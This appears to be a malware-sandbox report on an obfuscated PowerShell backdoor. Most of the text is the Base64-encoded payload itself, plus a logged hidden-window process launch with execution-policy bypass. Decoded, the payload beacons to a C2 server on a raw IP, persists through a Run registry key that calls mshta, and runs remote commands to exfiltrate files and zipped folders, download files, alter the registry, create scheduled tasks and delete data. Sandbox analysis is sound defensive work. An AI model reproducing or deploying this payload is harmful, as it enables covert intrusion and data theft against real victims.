5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAAPQAgAGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACcAJwA7AEkAZgAgACgAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAIAAtAG4AZQAgACcAJwApAHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAD0AJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEALgBMAGUAbgBnAHQAaAAgAC0AIAAyACkAOwAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAKQApADsAaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACkAewBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAKQB7ACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUAAgACsAIAAnAC4AYwBzAHYAJwA7AEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQACAAKwAgACcALgB6AGkAcAAnADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGQAaQByACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAPQAgACcAXwBmAGkAbABlACcAOwAkAG4AbwB3AHQAaQBtAGUAIAA9ACAARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkALQBNAE0ALQBkAGQAXwBIAEgAXwBtAG0AXwBzAHMAOwAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABuAG8AdwB0AGkAbQBlACAAKwAgACcAXwBmAGkAbABlACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AGgAVQBiAFUAVwBrAFoAYgBYACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwB0AGEAcwBrADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABlAGwAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AfQB9AH0AIABDAGEAdABjAGgAewB9AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADcAOwB9AHcAaABpAGwAZQAoACQAdAByAHUAZQAgAC0AZQBxACAAJAB0AHIAdQBlACkA

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 1, 2023, 7:53 p.m.	thread_identifier: 2188 thread_handle: 0x0000032c process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA0ADsAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAAgAD0AIAAxADAAMgA0ACAAKgAgADEAMAAyADQAOwAkAEUAVgBQACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAA9ACAAJwBoAHQAdABwADoALwAvADEANwAyAC4AOQAzAC4AMQA4ADEALgAyADQAOQAvAGMAbwBuAHQAcgBvAGwALwBjAG8AbQAuAHAAaABwACcAIAArACAAJwA/AFUAPQAnACAAKwAgACQARQBWAFAAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAEMATABQAFQATQBkAEcAdgBpAE8ASABmAFQATAAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABKAFEAUQB3AEUAIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAANAA3ADQANAA2ADUAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADkAMwAuADEAOAAxAC4AMgA0ADkALwBjAG8AbgB0AHIAbwBsAC8AaAB0AG0AbAAvADEALgBoAHQAbQBsACcAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAZgBwAEIAYgAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJABsAG8AbwBBAE0ASQBtAEkASwApAHsAJABUAEEAQwBLAHMAWABWAE4AcwBTACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAbwBvAEEATQBJAG0ASQBLACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABUAEEAQwBLAHMAWABWAE4AcwBTAC4ATABlAG4AZwB0AGgAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAFQAQQBDAEsAcwBYAFYATgBzAFMALAAgADAALAAgACQAVABBAEMASwBzAFgAVgBOAHMAUwAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwByAGUAdAB1AHIAbgAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdgBTAGwAbwBiAFYAbAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYALAAgACQARABiAEMALAAgACQAeABQAGIAdwBqAHQAUwBhAHAAVABJAEIAKQB7ACQAVABpAG0AZQBvAHUAdAA9ADEAMAAwADAAMAAwADAAMAA7ACQAQwBSAEwARgAgAD0AIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEQAKQAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEEAKQA7ACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgAD0AIAAnAC0ALQAnADsAJABCAG8AdQBuAGQAYQByAHkAIAA9ACAAJwAqACoAKgAqACoAJwA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJAByAE8AdQBNAEYAKQA7ACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEALAAwACwAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAApACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAFQAaQBtAGUAbwB1AHQAIAA9ACAAJABUAGkAbQBlAG8AdQB0ADsAJABnAFIATABRAGEAdABHAG8AaQBpAGYAZABVAFQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVACAAPQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ARwBlAHQAUgBlAHEAdQBlAHMA